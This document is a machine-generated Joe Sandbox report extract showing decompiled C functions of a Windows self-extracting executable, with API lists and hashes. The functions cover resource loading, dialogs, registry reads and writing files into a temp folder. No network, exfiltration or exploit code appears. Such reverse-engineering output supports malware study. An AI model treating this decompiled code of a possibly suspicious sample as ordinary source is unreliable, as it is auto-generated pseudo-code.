                                                                                                                                                                                                                                              • Part of subcall function 008D2773: CharNextA.USER32(0000054D), ref: 008D27B5
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: CharNextA.USER32(00000000), ref: 008D27BC
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2829
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: RegQueryValueExA.ADVAPI32(?,008D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2852
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2870
                                                                                                                                                                                                                                              • Part of subcall function 008D2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D28A0
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,008D3938,?,?,?,?,-00000005), ref: 008D2958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 008D2969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,008D3938,?,?,?,?,-00000005,?), ref: 008D2A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 008D2A81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3949799724-0
                                                                                                                                                                                                                                            • Opcode ID: 149bb1526d314c7980ba033df8743e998de5c75b18d71aa274f4836a026299c7
                                                                                                                                                                                                                                            • Instruction ID: 842406f904d316d294df892fc7892b6a3b977724e4c2ad0e729a1f3bd14bef38
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 149bb1526d314c7980ba033df8743e998de5c75b18d71aa274f4836a026299c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F511931900229EBCB25DF98D884AAEFBB5FF58711F14422BE915E3311D7319D41DB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E008D4169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E008D468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E008D468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E008D44B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,008D30B4), ref: 008D4189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,008D30B4), ref: 008D41E7
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: b99ec6ca344992c3199954c91f01b46f7600c502960a1bf6b9736c1cb9d509ef
                                                                                                                                                                                                                                            • Instruction ID: 122b34f92f6ebe2e139749a32206fd34e3377f2e5b789240c421523afa9035fa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b99ec6ca344992c3199954c91f01b46f7600c502960a1bf6b9736c1cb9d509ef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5801A2A13012147BFB2826A95C86F7B638EFB94795F104327B706D1380DA79CC41417A
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E008D19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                            					E008D43D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x8d9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}














APIs
• EndDialog.USER32(?,?), ref: 008D1A18
• GetDesktopWindow.USER32 ref: 008D1A24
• LoadStringA.USER32(?,?,00000200), ref: 008D1A4F
• SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 008D1A62
• MessageBeep.USER32(000000FF), ref: 008D1A6A
Memory Dump Source
• Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_file.jbxd
Similarity
• API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
• String ID:
• API String ID: 1273765764-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                            			E008D63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				long _v272;
                                                                                                                                                                                                                                            				void* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                            				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_v276 = _a16;
                                                                                                                                                                                                                                            				_t37 = 1;
                                                                                                                                                                                                                                            				E008D1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            				E008D658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                            				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                                                                                                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                            						 *0x8d9124 = 0x80070052;
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					CloseHandle(_t39);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					 *0x8d9124 = 0x80070052;
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D642D
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D645B
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D647A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008D63EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 1065093856-305352358
                                                                                                                                                                                                                                            • Opcode ID: 10f76ad957962077e26030349c2ab575efb07bd770b3a7357bb9d12f653e2ebe
                                                                                                                                                                                                                                            • Instruction ID: 09b27c25595f87f1d51906dab4a73740bf7736d26bed19cd827097574b434581
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10f76ad957962077e26030349c2ab575efb07bd770b3a7357bb9d12f653e2ebe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B221C371A0121CABDB10DF25DC85FEA7368FB45324F10436AE595E3280EAB45D948FA4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                                            				void _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                            				if(_t34 != 0) {
                                                                                                                                                                                                                                            					_t22 = _t33;
                                                                                                                                                                                                                                            					_t27 = _t22 + 1;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t6 =  *_t22;
                                                                                                                                                                                                                                            						_t22 = _t22 + 1;
                                                                                                                                                                                                                                            					} while (_t6 != 0);
                                                                                                                                                                                                                                            					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                            					 *_t34 = _t24;
                                                                                                                                                                                                                                            					if(_t24 != 0) {
                                                                                                                                                                                                                                            						_t28 = _t33;
                                                                                                                                                                                                                                            						_t19 = _t28 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t9 =  *_t28;
                                                                                                                                                                                                                                            							_t28 = _t28 + 1;
                                                                                                                                                                                                                                            						} while (_t9 != 0);
                                                                                                                                                                                                                                            						E008D1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                            						_t11 =  *0x8d91e0; // 0x33c7140
                                                                                                                                                                                                                                            						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                            						 *0x8d91e0 = _t34;
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t25 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            					E008D44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					LocalFree(_t34);
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            				E008D44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,008D4E6F), ref: 008D47EA
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 008D4823
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 008D4847
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008D4851
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 359063898-305352358
                                                                                                                                                                                                                                            • Opcode ID: 15b94904289b4bbeae00836d133c8119deddfd131965818ebb5d9efcf80cfaca
                                                                                                                                                                                                                                            • Instruction ID: 5f5f3b89a3ca210d7b84ef826c92cebd902600cc85205251955c05b217add19e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15b94904289b4bbeae00836d133c8119deddfd131965818ebb5d9efcf80cfaca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC112975605642AFDB188F28EC18F723B6AFB85350B14872BF982D7341DA35CC068760
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D3680(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                            								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t16 = 1;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                            						} while (_t8 != 0);
                                                                                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 008D369F
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008D36B2
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 008D36CB
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008D36DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                            • Opcode ID: 262da3bee696c52551278d0b6bdb532134e9f6e0e9ac26c2bba2c2f5257b6654
                                                                                                                                                                                                                                            • Instruction ID: ce3c0d14986d2b1040fda5d46643f61ee5c4170928d59e2b712bfc24929e828f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 262da3bee696c52551278d0b6bdb532134e9f6e0e9ac26c2bba2c2f5257b6654
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3101A77290121477DF305BA66C48EEB7B7CFBD6B10F10031BF915E2280D560C640D671
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E008D6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0x8d9a3c; // 0x8d0000
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t24 = _a16;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(008D0000,000007D6,00000005), ref: 008D652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(008D0000,00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008D6538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(008D0000,00000000,00000547,008D19E0,00000000), ref: 008D6557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008D6560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1214682469-0
                                                                                                                                                                                                                                            • Opcode ID: 8e68f6aecbc5b59d9103fe85748db8b128a530dac4e187fb552e2cf55ebbe905
                                                                                                                                                                                                                                            • Instruction ID: dea9e37b5a4438b84af801b4d31993953511f896bab8024420727fce19bda34e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e68f6aecbc5b59d9103fe85748db8b128a530dac4e187fb552e2cf55ebbe905
